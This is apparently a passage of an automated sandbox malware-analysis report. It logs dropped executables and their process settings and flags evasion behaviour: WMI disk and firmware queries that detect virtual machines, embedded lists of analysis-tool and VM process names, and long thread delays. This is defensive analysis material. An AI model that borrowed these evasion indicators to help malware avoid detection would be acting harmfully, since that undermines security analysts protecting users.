                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                            Query firmware table information (likely to detect VMs)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeSystem information queried: FirmwareTableInformation
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeSystem information queried: FirmwareTableInformation
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: sys_updater.exe.26.drBinary or memory string: VGAUTHSERVICE.EXE.EXEHOLLOWS_HUNTER32PROCEXP64.EXEPROCEXP.EXEPROCMON.EXEPROCMON64.EXEPESTUDIO.EXEKSDUMPER.EXEPRL_CC.EXEPRL_TOOLS.EXEPE-SIEVE64.EXEMONETA64.EXEFAKENET.EXEWIRESHARK.EXEVBOXSERVICE.EXEVMWAREUSER.EXEVMTOOLSD.EXEVMWARETRAY.EXEVMSRVC.EXEVBOXTRAY.EXEC:\USERS\HASSP\.CARGO\REGISTRY\SRC\INDEX.CRATES.IO-6F17D22BBA15001F\ANTILYSIS-0.1.2\SRC\LIB.RS>
                            Source: RPHbzz3JqY.exe, 00000000.00000002.1678871716.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 00000003.00000002.1679510345.000000000102E000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000003.00000002.1679178141.0000000000BBD000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 00000007.00000002.1764368656.000000000044C000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 00000007.00000002.1764698949.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 0000000E.00000002.1845369637.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 0000000E.00000002.1845219099.00000000008FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\FQ
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE`,FQ
                            Source: explert.exe, 00000007.00000002.1764368656.000000000044C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OSBIEDLL.DLLEAM - F
                            Source: RPHbzz3JqY.exe, 00000000.00000002.1678871716.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 00000003.00000002.1679178141.0000000000BBD000.00000004.00000010.00020000.00000000.sdmp, explert.exe, 0000000E.00000002.1845219099.00000000008FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLEAM - F
                            Source: sys_updater.exe.26.drBinary or memory string: HOLLOWS_HUNTER32PROCEXP64.EXEPROCEXP.EXEPROCMON.EXEPROCMON64.EXEPESTUDIO.EXEKSDUMPER.EXEPRL_CC.EXEPRL_TOOLS.EXEPE-SIEVE64.EXEMONETA64.EXEFAKENET.EXEWIRESHARK.EXEVBOXSERVICE.EXEVMWAREUSER.EXEVMTOOLSD.EXEVMWARETRAY.EXEVMSRVC.EXEVBOXTRAY.EXEC:\USERS\HASSP\.CARGO\REGISTRY\SRC\INDEX.CRATES.IO-6F17D22BBA15001F\ANTILYSIS-0.1.2\SRC\LIB.RS>
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory allocated: 234D6370000 memory reserve | memory write watchJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory allocated: 234EE550000 memory reserve | memory write watchJump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 1710000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 32E0000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 1710000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 5780000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 6780000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 68B0000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 78B0000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 7C00000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 8C00000 memory reserve | memory write watch
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: 9C00000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 14A0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2E60000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4E60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMemory allocated: 21E03AC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMemory allocated: 21E1BC10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMemory allocated: 159F3F40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMemory allocated: 159F4130000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMemory allocated: 20E49E20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMemory allocated: 20E621C0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMemory allocated: 237D54B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMemory allocated: 237ED740000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 1199988Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 599905Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 598968Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread delayed: delay time: 598000Jump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeWindow / User API: threadDelayed 4226Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeWindow / User API: threadDelayed 4819Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWindow / User API: threadDelayed 2243Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWindow / User API: threadDelayed 7533Jump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeAPI coverage: 7.5 %
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeAPI coverage: 5.0 %
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5180Thread sleep count: 4226 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5180Thread sleep time: -42260000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5660Thread sleep time: -60000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5180Thread sleep count: 4819 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe TID: 5180Thread sleep time: -48190000s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -240000s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59874s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59750s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59640s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59531s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59422s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59297s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59178s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59047s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -58932s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 7068Thread sleep time: -540000s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -1199988s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59877s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59754s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59629s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59504s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59363s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59238s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59113s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -58988s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -58863s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -58738s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -599905s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -119750s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59765s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59656s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59547s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59438s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59314s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -59189s >= -30000sJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 2124Thread sleep time: -598968s >= -30000sJump to behavior
